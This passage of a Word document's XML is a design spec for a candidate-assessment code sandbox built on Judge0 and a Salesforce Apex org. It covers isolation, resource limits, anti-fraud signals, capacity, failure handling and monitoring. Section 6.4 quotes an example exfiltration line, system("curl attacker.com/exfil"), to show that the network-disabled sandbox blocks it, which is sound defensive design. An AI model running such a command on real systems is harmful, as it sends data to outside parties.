        <w:t xml:space="preserve">Prevents: exfiltration of secrets, side-channel attacks, resource exhaustion via network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="filesystem-isolation"/>
      <w:r>
        <w:t xml:space="preserve">6.2 Filesystem Isolation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Read-only rootfs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Candidate code cannot modify system binaries or libraries.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Writable /tmp (tmpfs-backed):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Candidate can create temporary files; lost on container exit.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host volume mounts:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Eliminates path-traversal attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="resource-limits-cgroups-v2"/>
      <w:r>
        <w:t xml:space="preserve">6.3 Resource Limits (cgroups v2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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CPU:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 core per container (pinned); CPU throttling if exceeded.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Memory:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Per-language cap + OOM killer. If exceeded, container killed; orchestrator logs as test-fail.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Disk I/O:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Optional iops/throughput limits (not critical for Wave 1; add if abuse detected).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="code-injection-prevention"/>
      <w:r>
        <w:t xml:space="preserve">6.4 Code-Injection Prevention</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Parametrized stdin:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Test input passed via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field, never interpolated into shell commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">No shell evaluation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Judge0 source_code field is literal string;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or string substitution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Example attack (prevented):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Malicious code: system("curl attacker.com/exfil"); </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Container network: --network none → system() fails with "Network unreachable"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="anti-fraud-signals"/>
      <w:r>
        <w:t xml:space="preserve">6.5 Anti-Fraud Signals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capture per-submission: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"paste_vs_typed_ratio"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Keystroke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analysis;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&gt;0.7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suspicious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"time_on_task_ms"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Expected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ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">–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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s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suspicious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"copy_paste_event_count"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Detected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frontend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monitoring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"suspicious_ip_change"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mid-exam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"language_mismatch"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Selected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Python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Java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"identical_submission_count"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(plagiarism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signal)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 for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(flag for SME review) not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">auto-rejection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(compliance risk).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erformance-capacity-model"/>
      <w:r>
        <w:t xml:space="preserve">§ 7 Performance &amp; Capacity Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="throughput-target"/>
      <w:r>
        <w:t xml:space="preserve">7.1 Throughput Target</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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Wave 1 (M1–M2):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">~25 coding questions, ~100 Talpro India candidates = 2,500 executions/month (~80/day).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M3 scale (Wave 1 expansion):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1,000 coding questions, 5,000 active candidates = 50,000 executions/month (~1,667/day).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Year 1 plateau:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Assume 3,000 total executions/day (mix of ReadyBank, JD-Forge, Stack-Vault).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="mac-mini-m4-pro-capacity"/>
      <w:r>
        <w:t xml:space="preserve">7.2 Mac Mini M4 Pro Capacity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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Concurrent sandboxes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">50 (empirical; 16GB RAM, 12-core CPU).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Execution latency budget:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">p50: ≤ 2 sec (fast languages: Python, Go, Node)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">p95: ≤ 5 sec (compilation languages: C++, Java)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">p99: ≤ 10 sec (expensive: Rust, large code volumes)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Queue depth alarm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;100 jobs pending = page on-call (indicates scaling needed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="request-to-result-sla"/>
      <w:r>
        <w:t xml:space="preserve">7.3 Request-to-Result SLA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit code (T+0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ↓ (negligible, &lt; 100ms)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Job enqueued to Redis</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ↓ (queue wait: p50 &lt; 1s, p95 &lt; 5s, p99 &lt; 15s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Dequeued by orchestrator</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ↓ (execution time: varies per language)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Result from Judge0 / Apex</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ↓ (scoring: &lt; 100ms)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Response persisted to PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ↓ (negligible, &lt; 50ms)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Client polled result (T+X)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Total SLA: p50 ≤ 3s, p95 ≤ 12s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pex-sandbox-salesforce-specific"/>
      <w:r>
        <w:t xml:space="preserve">§ 8 Apex Sandbox (Salesforce-Specific)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="why-separate"/>
      <w:r>
        <w:t xml:space="preserve">8.1 Why Separate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Judge0 doesn’t support Apex (proprietary language). Salesforce Platform CLI provides</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">executeAnonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="setup"/>
      <w:r>
        <w:t xml:space="preserve">8.2 Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Create developer org (free)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sfdx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> force:org:create -f config/project-scratch-org-def.json -a dev_org -s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enable Apex execution</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sfdx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> force:apex:execute -f test.cls -u dev_org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="execution-flow"/>
      <w:r>
        <w:t xml:space="preserve">8.3 Execution Flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Pseudo-code in orchestrator</w:t>
      </w:r>
      <w:r>
        <w:br/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executeApex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apexCode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// Wrap in test harness to capture output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    String result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testCaseInputs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);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.debug('OUTPUT: ' + result);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subprocess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`sfdx force:apex:execute -f /tmp/code.cls -u dev_org`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subprocess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System.debug output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  const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/OUTPUT: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actualOutput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Compare vs expected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actualOutput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governorLimitExceeded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'GOVERNOR_LIMIT'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0" w:name="org-rotation"/>
      <w:r>
        <w:t xml:space="preserve">8.4 Org Rotation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Track Apex executions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infra.apex_executions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rotated_at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After 1000 executions, rotate to fresh org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infra.apex_executions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rotated_at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execution_count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rotated_at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Provision new org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infra.apex_executions (org_username)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'dev_org_'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gen_random_uuid());</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="capacity"/>
      <w:r>
        <w:t xml:space="preserve">8.5 Capacity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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Rate limit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 req/sec (Salesforce best practice; token-bucket in orchestrator).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Daily capacity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">~5,000 executions/day (Salesforce governor limits).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$0 (developer edition).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fallback-failure-modes"/>
      <w:r>
        <w:t xml:space="preserve">§ 9 Fallback &amp; Failure Modes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="judge0-down"/>
      <w:r>
        <w:t xml:space="preserve">9.1 Judge0 Down</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Mac Mini offline (network blip or reboot)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: Orchestrator timeout (30s) on Judge0 API call</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fallback (not Grade-based, but Operational):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Retry with exponential backoff (1s → 5s → 15s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. After 3 retries, requeue job (max backlog 24h)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Customer sees: "Your submission is queued. We'll grade it when the sandbox is back online. (ETA: 1 hour)"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Page on-call after 10 min of outage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="apex-sandbox-down"/>
      <w:r>
        <w:t xml:space="preserve">9.2 Apex Sandbox Down</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Salesforce API returns 500 error</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fallback: Requeue for retry; backlog held in Redis (no loss)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer sees: "Apex submission queued due to service maintenance. Estimated wait: 2 hours."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="compilation-timeout"/>
      <w:r>
        <w:t xml:space="preserve">9.3 Compilation Timeout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Candidate Rust code takes 3.5s to compile (budget = 2s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: Treated as compilation-error test-fail</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Feedback: "Compilation timeout. Your code took too long to compile (&gt;2.0s). Consider optimizing dependencies or build flags."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Score: 0/100 (no points for timeout)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="memory-overflow"/>
      <w:r>
        <w:t xml:space="preserve">9.4 Memory Overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Candidate Python code allocates 500MB list; limit = 256MB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: OOM killer → container exits with code 137</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Orchestrator: Logs as test-fail</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Feedback: "Memory limit exceeded (256 MB). Your code is allocating too much memory."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Score: 0/100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observability-monitoring"/>
      <w:r>
        <w:t xml:space="preserve">§ 10 Observability &amp; Monitoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="metrics-opentelemetry"/>
      <w:r>
        <w:t xml:space="preserve">10.1 Metrics (OpenTelemetry)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium_sandbox_execution_duration_ms{language, outcome} → histogram (p50, p95, p99)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium_sandbox_execution_total{language, outcome} → counter (success/fail/timeout/error)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium_sandbox_queue_depth → gauge (pending jobs)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium_sandbox_memory_usage_mb{language} → histogram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium_sandbox_timeout_rate{language} → gauge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="logging"/>
      <w:r>
        <w:t xml:space="preserve">10.2 Logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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"2026-05-03T10:15:23Z"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"qorium-judge0-orchestrator"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"qor-java-001"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"memory_usage_mb"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Logs ship to Grafana Cloud Loki via Vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="alerting-grafana-sentry"/>
      <w:r>
        <w:t xml:space="preserve">10.3 Alerting (Grafana + Sentry)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 depth critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;100 pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page on-call (Talpro Sentinel)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Judge0 error rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;5% in 5min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Slack #qorium-alerts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latency p95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;10s for 10min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Slack #qorium-alerts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Apex rate-limit exhausted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Token bucket drained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requeue; backlog grows; no alert (expected transient)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Compilation timeout rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;10% per language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Slack (investigate question difficulty)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migration-path-v0-v1-v2"/>
      <w:r>
        <w:t xml:space="preserve">§ 11 Migration Path (v0 → v1 → v2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="v0-phase-1-m1m2-foundation"/>
      <w:r>
        <w:t xml:space="preserve">v0 (Phase 1, M1–M2): Foundation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Self-hosted Judge0 on Mac Mini (12 languages)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apex CLI on Salesforce developer org</w:t>
